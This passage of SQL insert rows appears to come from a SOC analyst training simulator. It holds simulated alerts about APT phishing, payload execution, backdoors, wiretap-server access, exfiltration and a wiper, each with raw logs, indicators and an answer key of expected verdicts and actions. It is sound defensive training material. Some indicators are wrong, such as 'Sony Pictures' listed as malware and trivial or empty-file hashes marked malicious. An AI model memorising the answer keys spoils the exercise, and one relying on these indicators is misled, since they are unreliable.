2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:30:12Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"45.76.23.17\\\",\\\"user\\\":\\\"jdoe\\\",\\\"files_exfiltrated\\\":[\\\"confidential_report_2023.pdf\\\",\\\"financial_summary.xlsx\\\"],\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_port\\\":443,\\\"malware_associated\\\":\\\"Sony Pictures\\\",\\\"comment\\\":\\\"Data exfiltrated to external IP, associated with known APT operations.\\\"}\"},{\"timestamp\":\"2026-03-07T14:12:20.856Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:30:12Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"45.76.23.17\\\",\\\"user\\\":\\\"jdoe\\\",\\\"files_exfiltrated\\\":[\\\"confidential_report_2023.pdf\\\",\\\"financial_summary.xlsx\\\"],\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_port\\\":443,\\\"malware_associated\\\":\\\"Sony Pictures\\\",\\\"comment\\\":\\\"Data exfiltrated to external IP, associated with known APT operations.\\\"}\"},{\"timestamp\":\"2026-03-07T14:11:20.856Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:30:12Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"45.76.23.17\\\",\\\"user\\\":\\\"jdoe\\\",\\\"files_exfiltrated\\\":[\\\"confidential_report_2023.pdf\\\",\\\"financial_summary.xlsx\\\"],\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_port\\\":443,\\\"malware_associated\\\":\\\"Sony Pictures\\\",\\\"comment\\\":\\\"Data exfiltrated to external IP, associated with known APT operations.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1466, 'Initial Access via Spear Phishing', 'high', 'Federal Email Server Logs', 'A spear phishing email was sent to a federal employee, attempting to compromise user credentials. The email contained a malicious attachment disguised as a PDF document.', 'Phishing', 'T1566.001', 1, 'Closed', 296, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.105\",\"email_subject\":\"Urgent Update Required\",\"sender_email\":\"john.doe@federalagency.com\",\"recipient_email\":\"alice.smith@federalagency.com\",\"attachment\":\"Update_Required.pdf\",\"attachment_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"malicious_domain\":\"update-portal.example.com\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\"}', '2026-03-10 17:44:09', '2026-03-14 21:33:53', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known phishing server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal user IP\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Associated with phishing campaigns\"}},{\"id\":\"artifact_4\",\"type\":\"domain\",\"value\":\"update-portal.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Domain Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Phishing domain\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access via Spear Phishing\",\"date\":\"2026-03-11T02:38:07.558Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1467, 'Execution of Malicious Payload', 'high', 'Endpoint Detection Systems', 'Upon successful credential compromise, Salt Typhoon deploys a malicious payload to execute within federal systems, establishing a foothold. The payload was executed on a compromised endpoint.', 'Malware Deployment', 'T1059: Command and Scripting Interpreter', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"event_id\":\"EDR-56789\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"destination_username\":\"jdoe\",\"file_name\":\"payload.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"process_command_line\":\"C:\\\\Windows\\\\System32\\\\cmd.exe /c payload.exe\",\"detection_method\":\"Behavioral Analysis\",\"severity\":\"High\",\"status\":\"Malicious\"}', '2026-03-10 17:44:09', '2026-03-11 02:38:07', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Associated with known APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Corporate endpoint device.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"malicious\",\"details\":\"Identified as part of Salt Typhoon malware toolkit.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware sample.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Recent account compromise detected.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1468, 'Persistence through Backdoor Installation', 'high', 'Network Traffic Analysis', 'The attackers have installed a sophisticated backdoor to ensure sustained access to the compromised network. This backdoor allows them to maintain presence even if initial malware is detected and removed.', 'Persistence Mechanism', 'T1105 - Ingress Tool Transfer', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-03T14:23:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.5\",\"protocol\":\"TCP\",\"destination_port\":4444,\"filename\":\"backdoor_installer.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"jdoe\",\"event_type\":\"file_download\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"action\":\"download\",\"status\":\"successful\"}', '2026-03-10 17:44:09', '2026-03-11 02:38:07', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Corporate workstation\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"backdoor_installer.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Anti-malware Database\",\"verdict\":\"malicious\",\"details\":\"Backdoor installation executable\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1469, 'Lateral Movement to Wiretap Systems', 'high', 'Internal Network Monitoring', 'Using stolen credentials, an attacker has moved laterally within the network, attempting to access federal wiretap systems. The attack was detected at step 4, where unauthorized login attempts were observed from an internal host to a sensitive wiretap server.', 'Credential Access', 'T1078: Valid Accounts', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-15T14:25:37Z\",\"event_id\":\"4624\",\"hostname\":\"internal-host-3\",\"source_ip\":\"10.0.5.12\",\"destination_ip\":\"192.168.1.50\",\"destination_hostname\":\"wiretap-server-01\",\"username\":\"jdoe\",\"domain\":\"CORP\",\"logon_type\":\"3\",\"authentication_package\":\"Kerberos\",\"logon_process\":\"User32\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"status\":\"Success\"}', '2026-03-10 17:44:09', '2026-03-11 02:38:07', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.5.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the host used for lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"IP address of the target wiretap server.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"Username used for unauthorized access attempts.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Hash of the process used during login.\"}}],\"recommended_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1470, 'Exfiltration of Sensitive Communications', 'high', 'Data Loss Prevention Tools', 'Salt Typhoon has initiated the exfiltration of sensitive wiretap communications using a known malicious external IP address. This activity is consistent with their objective to deliver intelligence to their sponsors.', 'Data Exfiltration', 'T1041', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-05T14:23:34Z\",\"event_id\":\"data_exfiltration_001\",\"source_ip\":\"192.168.1.10\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"username\":\"jdoe\",\"exfil_filename\":\"wiretap_data.zip\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"event_description\":\"Data exfiltration detected from internal network to external IP.\",\"action_taken\":\"Alert triggered\"}', '2026-03-10 17:44:09', '2026-03-11 02:38:07', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the suspected host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with data exfiltration activities.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"wiretap_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file containing wiretap communications.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Hash Database\",\"verdict\":\"malicious\",\"details\":\"File hash associated with exfiltrated sensitive data.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"User Account Database\",\"verdict\":\"internal\",\"details\":\"Username of the account used for data exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-11T02:38:07.706Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:34Z\\\",\\\"event_id\\\":\\\"data_exfiltration_001\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfil_filename\\\":\\\"wiretap_data.zip\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"event_description\\\":\\\"Data exfiltration detected from internal network to external IP.\\\",\\\"action_taken\\\":\\\"Alert triggered\\\"}\"},{\"timestamp\":\"2026-03-11T02:37:07.706Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:34Z\\\",\\\"event_id\\\":\\\"data_exfiltration_001\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfil_filename\\\":\\\"wiretap_data.zip\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"event_description\\\":\\\"Data exfiltration detected from internal network to external IP.\\\",\\\"action_taken\\\":\\\"Alert triggered\\\"}\"},{\"timestamp\":\"2026-03-11T02:36:07.706Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:34Z\\\",\\\"event_id\\\":\\\"data_exfiltration_001\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfil_filename\\\":\\\"wiretap_data.zip\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"event_description\\\":\\\"Data exfiltration detected from internal network to external IP.\\\",\\\"action_taken\\\":\\\"Alert triggered\\\"}\"},{\"timestamp\":\"2026-03-11T02:35:07.706Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:34Z\\\",\\\"event_id\\\":\\\"data_exfiltration_001\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfil_filename\\\":\\\"wiretap_data.zip\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"event_description\\\":\\\"Data exfiltration detected from internal network to external IP.\\\",\\\"action_taken\\\":\\\"Alert triggered\\\"}\"},{\"timestamp\":\"2026-03-11T02:34:07.706Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:34Z\\\",\\\"event_id\\\":\\\"data_exfiltration_001\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfil_filename\\\":\\\"wiretap_data.zip\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"event_description\\\":\\\"Data exfiltration detected from internal network to external IP.\\\",\\\"action_taken\\\":\\\"Alert triggered\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1471, 'Initial Access via Phishing Campaign', 'high', 'Email Security Gateway', 'Hidden Cobra initiates their campaign with a wave of spear-phishing emails, targeting employees within the entertainment sector, aiming to gain a foothold in the network.', 'Social Engineering', 'T1566 - Phishing', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"source_email\":\"malicious_sender@compromised-domain.com\",\"destination_email\":\"employee@entertainmentcorp.com\",\"subject\":\"Urgent: Action Required\",\"attachment\":{\"filename\":\"Invoice_2023.pdf\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\",\"malicious_url\":\"http://malicious-download.com/payload.exe\"}', '2026-03-15 19:06:37', '2026-03-15 20:58:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with Hidden Cobra activities.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"malicious_sender@compromised-domain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Associated with previous phishing campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash known for delivering malware.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious-download.com/payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"URL hosting known malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access via Phishing Campaign\",\"date\":\"2026-03-15T20:58:14.812Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1472, 'Execution of Destover Wiper', 'high', 'Endpoint Detection and Response (EDR)', 'Once inside the network, Hidden Cobra deploys a modified variant of the Destover wiper, aiming to destroy data and disrupt services within critical infrastructure. This alert was triggered following the execution of the Destover payload on a compromised host.', 'Malware Deployment', 'T1485: Data Destruction', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"123456\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.100\",\"user\":\"compromised_user\",\"process_name\":\"destover.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"detected_action\":\"File execution\",\"host\":\"critical-infra-host\",\"severity\":\"high\",\"event_description\":\"Execution of known wiper malware variant on critical host\"}', '2026-03-15 19:06:37', '2026-03-15 20:58:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with Hidden Cobra operations\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Critical infrastructure host\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"User account used during malware execution\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"destover.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Executable file associated with Destover wiper\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as Destover malware variant\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1473, 'Establishing Persistence through Backdoors', 'high', 'Network Traffic Analysis', 'Anomalous traffic indicative of backdoor installation by Lazarus Group was detected. External communication with a known malicious IP and suspicious file transfer suggest an attempt to establish persistent access to compromised systems.', 'Backdoor Installation', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.45\",\"dst_port\":443,\"protocol\":\"HTTPS\",\"filename\":\"sysupdate.dll\",\"hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"user\":\"compromised_user\",\"action\":\"file_transfer\",\"direction\":\"outbound\",\"alert\":\"Suspicious Backdoor Installation Attempt\"}', '2026-03-15 19:06:37', '2026-03-15 20:58:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with Lazarus Group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised machine.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"sysupdate.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"File used by Lazarus Group for persistence.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with a known backdoor used by Lazarus Group.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"suspicious\",\"details\":\"User credentials possibly compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
